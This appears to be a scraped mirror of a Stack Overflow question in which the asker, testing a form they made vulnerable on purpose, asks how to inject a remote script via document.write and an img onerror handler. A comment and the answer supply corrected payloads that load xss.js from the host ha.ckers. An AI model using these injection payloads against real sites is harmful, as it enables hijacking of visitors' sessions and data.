Programmer puzzle solving

    最新消息:Welcome to the puzzle paradise for programmers! Here, a well-designed puzzle awaits you. From code logic puzzles to algorithmic challenges, each level is closely centered on the programmer's expertise and skills. Whether you're a novice programmer or an experienced tech guru, you'll find your own challenges on this site. In the process of solving puzzles, you can not only exercise your thinking skills, but also deepen your understanding and application of programming knowledge. Come to start this puzzle journey full of wisdom and challenges, with many programmers to compete with each other and show your programming wisdom! Translated with DeepL.com (free version)
    你的位置: HOME>matter>xss - load external javascript in the syntax - Stack Overflow

    xss - load external javascript in the syntax - Stack Overflow

    matteradmin5PV0评论

    How do i load an external .js script using this syntax?:

    <script>document.write('<script src=.js></script>')</script>.

    For all those wondering, i setup a test form i made purposely vulnerable but i couldn't get this to launch and yes i know :

    <script src=//ha.ckers/xss.js></script>

    Could easily work but i'm just trying to figure out how i could do it using document.write.

    Thanks to anyone who is able to help me. //Edit Why doesn't this work? <img src=x onerror=document.write('<script src=".js"><\/script>')>

    How do i load an external .js script using this syntax?:

    <script>document.write('<script src=http://ha.ckers/xss.js></script>')</script>.

    For all those wondering, i setup a test form i made purposely vulnerable but i couldn't get this to launch and yes i know :

    <script src=//ha.ckers/xss.js></script>

    Could easily work but i'm just trying to figure out how i could do it using document.write.

    Thanks to anyone who is able to help me. //Edit Why doesn't this work? <img src=x onerror=document.write('<script src="http://ha.ckers/xss.js"><\/script>')>

    • javascript
    • xss
    Share Improve this question edited Jul 3, 2013 at 22:24 user2536979 asked Jul 3, 2013 at 22:15 user2536979user2536979 311 gold badge3 silver badges8 bronze badges 1
    • You have to escape the </script> tag: <\/script> - otherwise the piler will end the JS with that tag and not with the right one – Niccolò Campolungo Commented Jul 3, 2013 at 22:16
    Add a ment  | 

    1 Answer 1

    Reset to default 1

    What you have to remember is that what lies within the <script>....</script> tags is opaque to the browser. Its job is, having seen <script>, to gather up everything largely without parsing it until it sees </script> and then had that intervening text off to the JavaScript engine.

    In your case, what it sees between <script> and </script> is:

    document.write('<script src=http://ha.ckers/xss.js>

    ...which obviously results in a syntax error. That's because the first </script> terminates the first <script>:

    <script>document.write('<script src=http://ha.ckers/xss.js></script>')</script>
<!-- Browser thinks things end here ---------------------------^ -->

    You have to break it up so it's not the literal sequence </script>. There are lots of ways to do that. Add a \:

    <script>document.write('<script src=http://ha.ckers/xss.js><\/script>')</script>

    or break the string:

    <script>document.write('<script src=http://ha.ckers/xss.js></scr' + 'ipt>')</script>

    Articles related to this article

    Post a comment

    comment list (0)

    1. No comments so far